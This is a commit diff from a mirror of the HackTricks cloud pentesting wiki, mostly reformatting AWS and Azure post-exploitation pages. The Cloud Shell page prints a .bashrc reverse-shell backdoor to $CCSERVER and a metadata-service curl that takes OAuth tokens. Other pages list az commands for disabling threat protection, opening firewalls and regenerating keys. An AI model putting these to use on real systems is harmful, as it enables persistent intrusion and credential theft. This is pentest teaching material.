gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2025-12-05 20:40:18 -08:00
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud

Browse Source
This commit is contained in:
Carlos Polop
2025-02-11 17:56:14 +01:00
parent 30236714f5 f258a13eef
commit 60b1ca6b88
33 changed files with 234 additions and 385 deletions
Download Patch File Download Diff File Expand all files Collapse all files

4
src/pentesting-cloud/aws-security/aws-basic-information/README.md
View File

@@ -309,8 +309,10 @@ AWS Identity and Access Management (IAM) provides **fine-grained access control*
In [**this page**](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_identifiers.html#identifiers-unique-ids) you can find the **IAM ID prefixe**d of keys depending on their nature:
| ABIA | [AWS STS service bearer token](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_bearer.html) |
| Identifier Code | Description |
| ---- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| ABIA | [AWS STS service bearer token](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_bearer.html) |
| ACCA | Context-specific credential |
| AGPA | User group |
| AIDA | IAM user |

4
src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md
View File

@@ -90,9 +90,9 @@ CloudTrail Event History allows you to inspect in a table the logs that have bee
The insights are stored in the same bucket as the CloudTrail logs in: `BucketName/AWSLogs/AccountID/CloudTrail-Insight`
### Security
| CloudTrail Log File Integrity | <ul><li>Validate if logs have been tampered with (modified or deleted)</li><li><p>Uses digest files (create hash for each file)</p><ul><li>SHA-256 hashing</li><li>SHA-256 with RSA for digital signing</li><li>private key owned by Amazon</li></ul></li><li>Takes 1 hour to create a digest file (done on the hour every hour)</li></ul> |
| Control Name | Implementation Details |
| ------------------------------------ | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ |
| CloudTrail Log File Integrity | <ul><li>Validate if logs have been tampered with (modified or deleted)</li><li><p>Uses digest files (create hash for each file)</p><ul><li>SHA-256 hashing</li><li>SHA-256 with RSA for digital signing</li><li>private key owned by Amazon</li></ul></li><li>Takes 1 hour to create a digest file (done on the hour every hour)</li></ul> |
| Stop unauthorized access | <ul><li><p>Use IAM policies and S3 bucket policies</p><ul><li>security team —> admin access</li><li>auditors —> read only access</li></ul></li><li>Use SSE-S3/SSE-KMS to encrypt the logs</li></ul> |
| Prevent log files from being deleted | <ul><li>Restrict delete access with IAM and bucket policies</li><li>Configure S3 MFA delete</li><li>Validate with Log File Validation</li></ul> |

4
src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.md
View File

@@ -118,9 +118,9 @@ Units are the measurement type associated with a metric. Units help to provide c
Allows to **aggregate and monitor logs from applications** and systems from **AWS services** (including CloudTrail) and **from apps/systems** (**CloudWatch Agen**t can be installed on a host). Logs can be **stored indefinitely** (depending on the Log Group settings) and can be exported.
**Elements**:
| **Log Group** | A **collection of log streams** that share the same retention, monitoring, and access control settings |
| Term | Definition |
| ------------------------ | ---------------------------------------------------------------------------------------------------------------------------------------------------------- |
| **Log Group** | A **collection of log streams** that share the same retention, monitoring, and access control settings |
| **Log Stream** | A sequence of **log events** that share the **same source** |
| **Subscription Filters** | Define a **filter pattern that matches events** in a particular log group, send them to Kinesis Data Firehose stream, Kinesis stream, or a Lambda function |

4
src/pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.md
View File

@@ -11,20 +11,16 @@ Azure Cloud Shell offers command-line access to manage Azure resources with pers
Example backdoor in .bashrc:
{% code overflow="wrap" %}
```bash
echo '(nohup /usr/bin/env -i /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/$CCSERVER/443 0>&1 &)' >> $HOME/.bashrc
```
{% endcode %}
This backdoor can execute commands even 5 minutes after the cloud shell is finished by the user.
Additionally query Azures metadata service for instance details and tokens:
{% code overflow="wrap" %}
```bash
curl -H "Metadata:true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" -s
```
{% endcode %}
{{#include ../../../banners/hacktricks-training.md}}

4
src/pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md
View File

@@ -10,7 +10,7 @@ For more information about storage check:
../az-services/az-storage.md
{{#endref}}
### Microsoft.Storage/storageAccounts/blobServices/containers/blobs/read
### `Microsoft.Storage/storageAccounts/blobServices/containers/blobs/read`
A principal with this permission will be able to **list** the blobs (files) inside a container and **download** the files which might contain **sensitive information**.
@@ -26,7 +26,7 @@ az storage blob download \
-n file.txt --auth-mode login
```
### Microsoft.Storage/storageAccounts/blobServices/containers/blobs/write
### `Microsoft.Storage/storageAccounts/blobServices/containers/blobs/write`
A principal with this permission will be able to **write and overwrite files in containers** which might allow him to cause some damage or even escalate privileges (e.g. overwrite some code stored in a blob):

55
src/pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.md
View File

@@ -5,27 +5,24 @@
## CosmosDB Post Exploitation
For more information about SQL Database check:
{% content-ref url="../az-services/az-cosmosDB.md" %}
[az-cosmosDB.md](../az-services/az-cosmosDB.md)
{% endcontent-ref %}
{{#ref}}
../az-services/az-cosmosDB.md
{{#endref}}
### "Microsoft.DocumentDB/databaseAccounts/read" && "Microsoft.DocumentDB/databaseAccounts/write"
### `Microsoft.DocumentDB/databaseAccounts/read` && `Microsoft.DocumentDB/databaseAccounts/write`
With this permission, you can create or update Azure Cosmos DB accounts. This includes modifying account-level settings, adding or removing regions, changing consistency levels, and enabling or disabling features like multi-region writes.
{% code overflow="wrap" %}
```bash
az cosmosdb update \
--name <account_name> \
--resource-group <resource_group_name> \
--public-network-access ENABLED
```
{% endcode %}
### "Microsoft.DocumentDB/databaseAccounts/sqlDatabases/containers/read" && "Microsoft.DocumentDB/databaseAccounts/sqlDatabases/containers/write"
### `Microsoft.DocumentDB/databaseAccounts/sqlDatabases/containers/read` && `Microsoft.DocumentDB/databaseAccounts/sqlDatabases/containers/write`
With this permission, you can create or modify containers (collections) within a SQL database of an Azure Cosmos DB account. Containers are used to store data, and changes to them can impact the database's structure and access patterns.
{% code overflow="wrap" %}
```bash
# Create
az cosmosdb sql container create \
@@ -43,25 +40,21 @@ az cosmosdb sql container update \
--name <container_name> \
--ttl 3600
```
{% endcode %}
### "Microsoft.DocumentDB/databaseAccounts/sqlDatabases/write" && "Microsoft.DocumentDB/databaseAccounts/sqlDatabases/read"
### `Microsoft.DocumentDB/databaseAccounts/sqlDatabases/write` && `Microsoft.DocumentDB/databaseAccounts/sqlDatabases/read`
With this permission, you can create or modify SQL databases within an Azure Cosmos DB account. This allows for managing the database structure and adding new databases to the account. While this permission enables database creation, improper or unauthorized use could result in unnecessary resource consumption, increased costs, or operational inefficiencies.
{% code overflow="wrap" %}
```bash
az cosmosdb sql database create \
--account-name <account_name> \
--resource-group <resource_group_name> \
--name <database_name>
```
{% endcode %}
### "Microsoft.DocumentDB/databaseAccounts/failoverPriorityChange/action"
### `Microsoft.DocumentDB/databaseAccounts/failoverPriorityChange/action`
With this permission, you can change the failover priority of regions for an Azure Cosmos DB database account. This action determines the order in which regions become primary during a failover event. Improper use of this permission can disrupt the high availability of the database or lead to unintended operational impacts.
{% code overflow="wrap" %}
```bash
az cosmosdb failover-priority-change \
--name <database_account_name> \
@@ -69,12 +62,10 @@ az cosmosdb failover-priority-change \
--failover-policies <region1=priority1> <region2=priority2>
```
{% endcode %}
### "Microsoft.DocumentDB/databaseAccounts/regenerateKey/action"
### `Microsoft.DocumentDB/databaseAccounts/regenerateKey/action`
With this permission, you can regenerate the primary or secondary keys for an Azure Cosmos DB account. This is typically used to enhance security by replacing old keys, but it can disrupt access for services or applications that rely on the current keys.
{% code overflow="wrap" %}
```bash
az cosmosdb keys regenerate \
--name <account_name> \
@@ -82,13 +73,11 @@ az cosmosdb keys regenerate \
--key-kind <primary|secondary>
```
{% endcode %}
### "Microsoft.DocumentDB/databaseAccounts/sqlDatabases/containers/userDefinedFunctions/write" && "Microsoft.DocumentDB/databaseAccounts/sqlDatabases/containers/userDefinedFunctions/read"
### `Microsoft.DocumentDB/databaseAccounts/sqlDatabases/containers/userDefinedFunctions/write` && `Microsoft.DocumentDB/databaseAccounts/sqlDatabases/containers/userDefinedFunctions/read`
With this permission, you can create or modify triggers within a container of a SQL database in an Azure Cosmos DB account. Triggers allow you to execute server-side logic in response to operations.
{% code overflow="wrap" %}
```bash
az cosmosdb sql trigger create \
--account-name <account_name> \
@@ -100,12 +89,10 @@ az cosmosdb sql trigger create \
--type Pre \
--operation All
```
{% endcode %}
### "Microsoft.DocumentDB/databaseAccounts/sqlDatabases/containers/storedProcedures/write" && "Microsoft.DocumentDB/databaseAccounts/sqlDatabases/containers/storedProcedures/read"
### `Microsoft.DocumentDB/databaseAccounts/sqlDatabases/containers/storedProcedures/write` && `Microsoft.DocumentDB/databaseAccounts/sqlDatabases/containers/storedProcedures/read`
With this permission, you can create or modify stored procedures within a container of a SQL database in an Azure Cosmos DB account. Stored procedures in Cosmos DB are server-side JavaScript functions that allow you to encapsulate logic for processing data or performing operations directly within the database.
{% code overflow="wrap" %}
```bash
az cosmosdb sql stored-procedure create \
--account-name <account_name> \
@@ -115,12 +102,10 @@ az cosmosdb sql stored-procedure create \
--name <stored_procedure_name> \
--body 'function sample() { return "Hello, Cosmos!"; }'
```
{% endcode %}
### "Microsoft.DocumentDB/databaseAccounts/sqlDatabases/containers/triggers/write" && "Microsoft.DocumentDB/databaseAccounts/sqlDatabases/containers/triggers/read"
### `Microsoft.DocumentDB/databaseAccounts/sqlDatabases/containers/triggers/write` && `Microsoft.DocumentDB/databaseAccounts/sqlDatabases/containers/triggers/read`
With this permission, you can create or modify triggers within a container of a SQL database in an Azure Cosmos DB account. Triggers allow you to execute server-side logic in response to operations like inserts, updates, or deletes.
{% code overflow="wrap" %}
```bash
az cosmosdb sql trigger create \
--account-name <account_name> \
@@ -132,12 +117,10 @@ az cosmosdb sql trigger create \
--type Pre \
--operation All
```
{% endcode %}
### "Microsoft.DocumentDB/databaseAccounts/mongodbDatabases/collections/read" && "Microsoft.DocumentDB/databaseAccounts/mongodbDatabases/collections/write"
### `Microsoft.DocumentDB/databaseAccounts/mongodbDatabases/collections/read` && `Microsoft.DocumentDB/databaseAccounts/mongodbDatabases/collections/write`
With this permission, you can create or modify collections within MongoDB databases in an Azure Cosmos DB account. Collections are used to store documents and define the structure and partitioning for data.
{% code overflow="wrap" %}
```bash
az cosmosdb mongodb collection create \
--account-name <account_name> \
@@ -145,24 +128,20 @@ az cosmosdb mongodb collection create \
--database-name <mongodb_database_name> \
--name <collection_name>
```
{% endcode %}
### "Microsoft.DocumentDB/databaseAccounts/mongodbDatabases/write" && "Microsoft.DocumentDB/databaseAccounts/mongodbDatabases/read"
### `Microsoft.DocumentDB/databaseAccounts/mongodbDatabases/write` && `Microsoft.DocumentDB/databaseAccounts/mongodbDatabases/read`
With this permission, you can create new MongoDB databases within an Azure Cosmos DB account. This allows for provisioning new databases to store and manage collections and documents.
{% code overflow="wrap" %}
```bash
az cosmosdb mongodb database create \
--account-name <account_name> \
--resource-group <resource_group_name> \
--name <database_name>
```
{% endcode %}
### "Microsoft.DocumentDB/databaseAccounts/mongodbRoleDefinitions/write" && "Microsoft.DocumentDB/databaseAccounts/mongodbRoleDefinitions/read"
### `Microsoft.DocumentDB/databaseAccounts/mongodbRoleDefinitions/write` && `Microsoft.DocumentDB/databaseAccounts/mongodbRoleDefinitions/read`
With this permission, you can create new MongoDB role definitions within an Azure Cosmos DB account. This allows defining custom roles with specific permissions for MongoDB users.
{% code overflow="wrap" %}
```bash
az cosmosdb mongodb role definition create \
--account-name <account_name> \
@@ -188,11 +167,10 @@ az cosmosdb mongodb role definition create \
"Roles": []
}'
```
{% endcode %}
### "Microsoft.DocumentDB/databaseAccounts/mongodbUserDefinitions/write" && "Microsoft.DocumentDB/databaseAccounts/mongodbUserDefinitions/read"
### `Microsoft.DocumentDB/databaseAccounts/mongodbUserDefinitions/write` && `Microsoft.DocumentDB/databaseAccounts/mongodbUserDefinitions/read`
With this permission, you can create new MongoDB user definitions within an Azure Cosmos DB account. This allows the provisioning of users with specific roles and access levels to MongoDB databases.
{% code overflow="wrap" %}
```bash
az cosmosdb mongodb user definition create \
--account-name <account_name> \
@@ -212,7 +190,6 @@ az cosmosdb mongodb user definition create \
]
}'
```
{% endcode %}
{{#include ../../../banners/hacktricks-training.md}}

4
src/pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md
View File

@@ -10,7 +10,7 @@ For more information about file shares check:
../az-services/az-file-shares.md
{{#endref}}
### Microsoft.Storage/storageAccounts/fileServices/fileshares/files/read
### `Microsoft.Storage/storageAccounts/fileServices/fileshares/files/read`
A principal with this permission will be able to **list** the files inside a file share and **download** the files which might contain **sensitive information**.
@@ -30,7 +30,7 @@ az storage file download \
--auth-mode login --enable-file-backup-request-intent
```
### Microsoft.Storage/storageAccounts/fileServices/fileshares/files/write, Microsoft.Storage/storageAccounts/fileServices/writeFileBackupSemantics/action
### `Microsoft.Storage/storageAccounts/fileServices/fileshares/files/write`, `Microsoft.Storage/storageAccounts/fileServices/writeFileBackupSemantics/action`
A principal with this permission will be able to **write and overwrite files in file shares** which might allow him to cause some damage or even escalate privileges (e.g. overwrite some code stored in a file share):

42
src/pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.md
View File

@@ -5,14 +5,13 @@
## Logic Apps Database Post Exploitation
For more information about logic apps check:
{% content-ref url="../az-services/az-logic-apps.md" %}
[az-logic-apps.md](../az-services/az-logic-apps.md)
{% endcontent-ref %}
{{#ref}}
../az-services/az-logic-apps.md
{{#endref}}
### "Microsoft.Logic/workflows/read", "Microsoft.Logic/workflows/write" && "Microsoft.ManagedIdentity/userAssignedIdentities/assign/action"
### `Microsoft.Logic/workflows/read`, `Microsoft.Logic/workflows/write` && `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action`
With these permissions, you can modify Logic App workflows and manage their identities. Specifically, you can assign or remove system-assigned and user-assigned managed identities to workflows, which allows the Logic App to authenticate and access other Azure resources without explicit credentials.
{% code overflow="wrap" %}
```bash
az logic workflow identity remove/assign \
--name <workflow_name> \
@@ -20,49 +19,41 @@ az logic workflow identity remove/assign \
--system-assigned true \
--user-assigned "/subscriptions/<subscription_id>/resourceGroups/<resource_group>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<identity_name>"
```
{% endcode %}
### "Microsoft.Web/sites/read", "Microsoft.Web/sites/write"
### `Microsoft.Web/sites/read`, `Microsoft.Web/sites/write`
With these permissions, you can create or update Logic Apps hosted on an App Service Plan. This includes modifying settings such as enabling or disabling HTTPS enforcement.
{% code overflow="wrap" %}
```bash
az logicapp update \
--resource-group <resource_group_name> \
--name <logic_app_name> \
--set httpsOnly=false
```
{% endcode %}
### "Microsoft.Web/sites/stop/action", "Microsoft.Web/sites/start/action" || "Microsoft.Web/sites/restart/action"
### `Microsoft.Web/sites/stop/action`, `Microsoft.Web/sites/start/action` || `Microsoft.Web/sites/restart/action`
With this permission, you can start/stop/restart a web app, including Logic Apps hosted on an App Service Plan. This action ensures that a previously stopped app is brought online and resumes its functionality. This can disrupt workflows, trigger unintended operations, or cause downtime by starting, stopping, or restarting Logic Apps unexpectedly.
{% code overflow="wrap" %}
```bash
az webapp start/stop/restart \
--name <logic_app_name> \
--resource-group <resource_group_name>
```
{% endcode %}
### "Microsoft.Web/sites/config/list/action", "Microsoft.Web/sites/read" && "Microsoft.Web/sites/config/write"
### `Microsoft.Web/sites/config/list/action`, `Microsoft.Web/sites/read` && `Microsoft.Web/sites/config/write`
With this permission, you can configure or modify settings for web apps, including Logic Apps hosted on an App Service Plan. This allows changes to app settings, connection strings, authentication configurations, and more.
{% code overflow="wrap" %}
```bash
az logicapp config appsettings set \
--name <logic_app_name> \
--resource-group <resource_group_name> \
--settings "<key>=<value>"
```
{% endcode %}
### "Microsoft.Logic/integrationAccounts/write"
### `Microsoft.Logic/integrationAccounts/write`
With this permission, you can create, update, or delete Azure Logic Apps integration accounts. This includes managing integration account-level configurations like maps, schemas, partners, agreements, and more.
{% code overflow="wrap" %}
```bash
az logic integration-account create \
--resource-group <resource_group_name> \
@@ -71,13 +62,11 @@ az logic integration-account create \
--sku <Standard|Free> \
--state Enabled
```
{% endcode %}
### "Microsoft.Resources/subscriptions/resourcegroups/read" && "Microsoft.Logic/integrationAccounts/batchConfigurations/write"
### `Microsoft.Resources/subscriptions/resourcegroups/read` && `Microsoft.Logic/integrationAccounts/batchConfigurations/write`
With this permission, you can create or modify batch configurations within an Azure Logic Apps integration account. Batch configurations define how Logic Apps process and group incoming messages for batch processing.
{% code overflow="wrap" %}
```bash
az logic integration-account batch-configuration create \
--resource-group <resource_group_name> \
@@ -88,12 +77,10 @@ az logic integration-account batch-configuration create \
"batchSize": 1048576,
}'
```
{% endcode %}
### "Microsoft.Resources/subscriptions/resourcegroups/read" && "Microsoft.Logic/integrationAccounts/maps/write"
### `Microsoft.Resources/subscriptions/resourcegroups/read` && `Microsoft.Logic/integrationAccounts/maps/write`
With this permission, you can create or modify maps within an Azure Logic Apps integration account. Maps are used to transform data from one format to another, enabling seamless integration between different systems and applications.
{% code overflow="wrap" %}
```bash
az logic integration-account map create \
--resource-group <resource_group_name> \
@@ -103,12 +90,10 @@ az logic integration-account map create \
--content-type application/xml \
--map-content map-content.xslt
```
{% endcode %}
### "Microsoft.Resources/subscriptions/resourcegroups/read" && "Microsoft.Logic/integrationAccounts/partners/write"
### `Microsoft.Resources/subscriptions/resourcegroups/read` && `Microsoft.Logic/integrationAccounts/partners/write`
With this permission, you can create or modify partners in an Azure Logic Apps integration account. Partners represent entities or systems that participate in business-to-business (B2B) workflows.
{% code overflow="wrap" %}
```bash
az logic integration-account partner create \
--resource-group <resource_group_name> \
@@ -126,12 +111,10 @@ az logic integration-account partner create \
}
}'
```
{% endcode %}
### "Microsoft.Resources/subscriptions/resourcegroups/read" && "Microsoft.Logic/integrationAccounts/sessions/write"
### `Microsoft.Resources/subscriptions/resourcegroups/read` && `Microsoft.Logic/integrationAccounts/sessions/write`
With this permission, you can create or modify sessions within an Azure Logic Apps integration account. Sessions are used in B2B workflows to group messages and track related transactions over a defined period.
{% code overflow="wrap" %}
```bash
az logic integration-account session create \
--resource-group <resource_group_name> \
@@ -147,7 +130,6 @@ az logic integration-account session create \
}
}'
```
{% endcode %}
### "*/delete"
With this permissions you can delete resources related to Azure Logic Apps

44
src/pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.md
View File

@@ -5,54 +5,47 @@
## MySQL Database Post Exploitation
For more information about MySQL Database check:
{% content-ref url="../az-services/az-mysql.md" %}
[az-mysql.md](../az-services/az-mysql.md)
{% endcontent-ref %}
{{#ref}}
../az-services/az-mysql.md
{{#endref}}
### "Microsoft.DBforMySQL/flexibleServers/databases/write" && "Microsoft.DBforMySQL/flexibleServers/databases/read"
### `Microsoft.DBforMySQL/flexibleServers/databases/write` && `Microsoft.DBforMySQL/flexibleServers/databases/read`
With this permission, you can create new databases within a MySQL Flexible Server instance on Azure. While this action itself does not modify existing resources, excessive or unauthorized creation of databases could lead to resource consumption, or potential misuse of the server.
{% code overflow="wrap" %}
```bash
az mysql flexible-server db create \
--server-name <server_name> \
--resource-group <resource_group_name> \
--database-name <database_name>
```
{% endcode %}
### "Microsoft.DBforMySQL/flexibleServers/backups/write"
### `Microsoft.DBforMySQL/flexibleServers/backups/write`
With this permission, you can initiate the creation of backups for a MySQL Flexible Server instance on Azure. This allows users to generate on-demand backups, which can be useful for preserving data at specific points in time.
{% code overflow="wrap" %}
```bash
az mysql flexible-server backup create \
--name <server_name> \
--resource-group <resource_group_name>
--backup-name <backup_name>
```
{% endcode %}
### "Microsoft.DBforMySQL/flexibleServers/advancedThreatProtectionSettings/write"
### `Microsoft.DBforMySQL/flexibleServers/advancedThreatProtectionSettings/write`
With this permission, you can configure or update the Advanced Threat Protection (ATP) settings for a MySQL Flexible Server instance on Azure. This allows enabling or diabling security features designed to detect and respond to anomalous activities and potential threats.
{% code overflow="wrap" %}
```bash
az mysql flexible-server threat-protection-policy update \
--name <server_name> \
--resource-group <resource_group_name> \
--state <Enabled|Disabled>
```
{% endcode %}
### "Microsoft.DBforMySQL/flexibleServers/firewallRules/write"
### `Microsoft.DBforMySQL/flexibleServers/firewallRules/write`
With this permission, you can create or modify firewall rules for a MySQL Flexible Server instance on Azure. This allows control over which IP addresses or ranges can access the server. Unauthorized or improper use of this permission could expose the server to unwanted or malicious access.
{% code overflow="wrap" %}
```bash
# Create Rule
az mysql flexible-server firewall-rule create \
@@ -70,71 +63,60 @@ az mysql flexible-server firewall-rule update \
--start-ip-address <start_ip> \
--end-ip-address <end_ip>
```
{% endcode %}
### "Microsoft.DBforMySQL/flexibleServers/resetGtid/action"
### `Microsoft.DBforMySQL/flexibleServers/resetGtid/action`
With this permission, you can reset the GTID (Global Transaction Identifier) for a MySQL Flexible Server instance on Azure. Resetting GTID will invalidate all the automated, on-demand backups and geo-backups that were taken before the reset action. After GTID reset, you will not be able to perform PITR (point-in-time-restore) using fastest restore point or by custom restore point if the selected restore time is before the GTID reset time. And successful geo-restore will be possible only after 5 days.
{% code overflow="wrap" %}
```bash
az mysql flexible-server reset-gtid \
--name \
--resource-group <resource_group_name> \
--gtid-set <gtid>
```
{% endcode %}
### "Microsoft.DBforMySQL/flexibleServers/updateConfigurations/action"
### `Microsoft.DBforMySQL/flexibleServers/updateConfigurations/action`
With this permission, you can update the configuration settings of a MySQL Flexible Server instance on Azure. This allows customization of server parameters such as performance tuning, security configurations, or operational settings. You can update the following parameters together in a batch: audit_log_enabled, audit_log_events, binlog_expire_logs_seconds, binlog_row_image, character_set_server, collation_server, connect_timeout, enforce_gtid_consistency, gtid_mode, init_connect, innodb_buffer_pool_size, innodb_io_capacity, innodb_io_capacity_max, innodb_purge_threads, innodb_read_io_threads, innodb_thread_concurrency, innodb_write_io_threads, long_query_time, max_connect_errors, and max_connections.
{% code overflow="wrap" %}
```bash
az mysql flexible-server parameter set-batch \
--resource-group <resource_group_name> \
--server-name <server_name> \
--args max_connections=<value>
```
{% endcode %}
### "Microsoft.DBforMySQL/flexibleServers/read", "Microsoft.DBforMySQL/flexibleServers/write" && "Microsoft.ManagedIdentity/userAssignedIdentities/assign/action"
### `Microsoft.DBforMySQL/flexibleServers/read`, `Microsoft.DBforMySQL/flexibleServers/write` && `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action`
With this permission, you can assign a user-assigned managed identity to MySQL flexible servers.
{% code overflow="wrap" %}
```bash
az mysql flexible-server identity assign \
--resource-group <ResourceGroupName> \
--server-name <ServerName> \
--identity <IdentityName>
```
{% endcode %}
### "Microsoft.DBforMySQL/flexibleServers/stop/action"
### `Microsoft.DBforMySQL/flexibleServers/stop/action`
With this permission, you can stop a PostgreSQL Flexible Server instance on Azure. Stopping a server can lead to temporary service disruption, affecting applications and users dependent on the database.
{% code overflow="wrap" %}
```bash
az mysql flexible-server stop \
--name <server_name> \
--resource-group <resource_group_name>
```
{% endcode %}
### "Microsoft.DBforMySQL/flexibleServers/start/action"
### `Microsoft.DBforMySQL/flexibleServers/start/action`
With this permission, you can start a stopped PostgreSQL Flexible Server instance on Azure. Starting a server restores its availability, enabling applications and users to reconnect and access the database.
{% code overflow="wrap" %}
```bash
az mysql flexible-server start \
--name <server_name> \
--resource-group <resource_group_name>
```
{% endcode %}
### "*/delete"
### `*/delete`
With this permissions you can delete resources related to mysql server in Azure such as server, firewalls, managed identities or configurations

40
src/pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.md
View File

@@ -5,54 +5,47 @@
## PostgreSQL Database Post Exploitation
For more information about PostgreSQL Database check:
{% content-ref url="../az-services/az-postgresql.md" %}
[az-postgresql.md](../az-services/az-postgresql.md)
{% endcontent-ref %}
{{#ref}}
../az-services/az-postgresql.md
{{#endref}}
### "Microsoft.DBforPostgreSQL/flexibleServers/databases/write" && "Microsoft.DBforPostgreSQL/flexibleServers/databases/read"
### `Microsoft.DBforPostgreSQL/flexibleServers/databases/write` && `Microsoft.DBforPostgreSQL/flexibleServers/databases/read`
With this permission, you can create new databases within a Postgres Flexible Server instance on Azure. While this action itself does not modify existing resources, excessive or unauthorized creation of databases could lead to resource consumption, or potential misuse of the server.
{% code overflow="wrap" %}
```bash
az postgres flexible-server db create \
--server-name <server_name> \
--resource-group <resource_group_name> \
--database-name <database_name>
```
{% endcode %}
### "Microsoft.DBforPostgreSQL/flexibleServers/backups/write"
### `Microsoft.DBforPostgreSQL/flexibleServers/backups/write`
With this permission, you can initiate the creation of backups for a Postgres Flexible Server instance on Azure. This allows users to generate on-demand backups, which can be useful for preserving data at specific points in time.
{% code overflow="wrap" %}
```bash
az postgres flexible-server backup create \
--name <server_name> \
--resource-group <resource_group_name>
--backup-name <backup_name>
```
{% endcode %}
### "Microsoft.DBforPostgreSQL/flexibleServers/advancedThreatProtectionSettings/write" && "Microsoft.DBforPostgreSQL/flexibleServers/advancedThreatProtectionSettings/read"
### `Microsoft.DBforPostgreSQL/flexibleServers/advancedThreatProtectionSettings/write` && `Microsoft.DBforPostgreSQL/flexibleServers/advancedThreatProtectionSettings/read`
With this permission, you can configure or update the Advanced Threat Protection (ATP) settings for a Postgres Flexible Server instance on Azure. This allows enabling or diabling security features designed to detect and respond to anomalous activities and potential threats.
{% code overflow="wrap" %}
```bash
az postgres flexible-server threat-protection-policy update \
--name <server_name> \
--resource-group <resource_group_name> \
--state <Enabled|Disabled>
```
{% endcode %}
### "Microsoft.DBforPostgreSQL/flexibleServers/firewallRules/write", "Microsoft.DBforPostgreSQL/flexibleServers/read" && "Microsoft.DBforPostgreSQL/flexibleServers/firewallRules/read"
### `Microsoft.DBforPostgreSQL/flexibleServers/firewallRules/write`, `Microsoft.DBforPostgreSQL/flexibleServers/read` && `Microsoft.DBforPostgreSQL/flexibleServers/firewallRules/read`
With this permission, you can create or modify firewall rules for a Postgres Flexible Server instance on Azure. This allows control over which IP addresses or ranges can access the server. Unauthorized or improper use of this permission could expose the server to unwanted or malicious access.
{% code overflow="wrap" %}
```bash
# Create Rule
az postgres flexible-server firewall-rule create \
@@ -70,13 +63,11 @@ az postgres flexible-server firewall-rule update \
--start-ip-address <start_ip> \
--end-ip-address <end_ip>
```
{% endcode %}
### "Microsoft.DBforPostgreSQL/flexibleServers/configurations/write" && "Microsoft.DBforPostgreSQL/flexibleServers/configurations/read"
### `Microsoft.DBforPostgreSQL/flexibleServers/configurations/write` && `Microsoft.DBforPostgreSQL/flexibleServers/configurations/read`
With this permission, you can update the configuration settings of a Postgres Flexible Server instance on Azure. This allows customization of server parameters such as performance tuning, security configurations, or operational settings.
{% code overflow="wrap" %}
```bash
az postgres flexible-server parameter set \
--resource-group <resource_group_name> \
@@ -84,45 +75,38 @@ az postgres flexible-server parameter set \
--name <parameter_name> \
--value <parameter_value>
```
{% endcode %}
### "Microsoft.DBforPostgreSQL/flexibleServers/stop/action"
### `Microsoft.DBforPostgreSQL/flexibleServers/stop/action`
With this permission, you can stop a PostgreSQL Flexible Server instance on Azure. Stopping a server can lead to temporary service disruption, affecting applications and users dependent on the database.
{% code overflow="wrap" %}
```bash
az postgres flexible-server stop \
--name <server_name> \
--resource-group <resource_group_name>
```
{% endcode %}
### "Microsoft.DBforPostgreSQL/flexibleServers/start/action"
### `Microsoft.DBforPostgreSQL/flexibleServers/start/action`
With this permission, you can start a stopped PostgreSQL Flexible Server instance on Azure. Starting a server restores its availability, enabling applications and users to reconnect and access the database.
{% code overflow="wrap" %}
```bash
az postgres flexible-server start \
--name <server_name> \
--resource-group <resource_group_name>
```
{% endcode %}
### "Microsoft.DBforPostgreSQL/flexibleServers/read", "Microsoft.DBforPostgreSQL/flexibleServers/write" && "Microsoft.ManagedIdentity/userAssignedIdentities/assign/action"
### `Microsoft.DBforPostgreSQL/flexibleServers/read`, `Microsoft.DBforPostgreSQL/flexibleServers/write` && `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action`
With this permission, you can assign a user-assigned managed identity to postgres flexible servers.
{% code overflow="wrap" %}
```bash
az postgres flexible-server identity assign \
--resource-group <ResourceGroupName> \
--server-name <ServerName> \
--identity <IdentityName>
```
{% endcode %}
### "*/delete"
### `*/delete`
With this permissions you can delete resources related to postgres server in Azure such as server, firewalls, managed identities or configurations

14
src/pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.md
View File

@@ -10,7 +10,7 @@ For more information about SQL Database check:
../az-services/az-sql.md
{{#endref}}
### "Microsoft.Sql/servers/databases/read", "Microsoft.Sql/servers/read" && "Microsoft.Sql/servers/databases/write"
### `Microsoft.Sql/servers/databases/read`, `Microsoft.Sql/servers/read` && `Microsoft.Sql/servers/databases/write`
With these permissions, an attacker can create and update databases within the compromised environment. This post-exploitation activity could allow an attacker to add malicious data, modify database configurations, or insert backdoors for further persistence, potentially disrupting operations or enabling additional malicious actions.
@@ -22,7 +22,7 @@ az sql db create --resource-group <resource-group> --server <server-name> --name
az sql db update --resource-group <resource-group> --server <server-name> --name <database-name> --max-size <max-size-in-bytes>
```
### "Microsoft.Sql/servers/elasticPools/write" && "Microsoft.Sql/servers/elasticPools/read"
### `Microsoft.Sql/servers/elasticPools/write` && `Microsoft.Sql/servers/elasticPools/read`
With these permissions, an attacker can create and update elasticPools within the compromised environment. This post-exploitation activity could allow an attacker to add malicious data, modify database configurations, or insert backdoors for further persistence, potentially disrupting operations or enabling additional malicious actions.
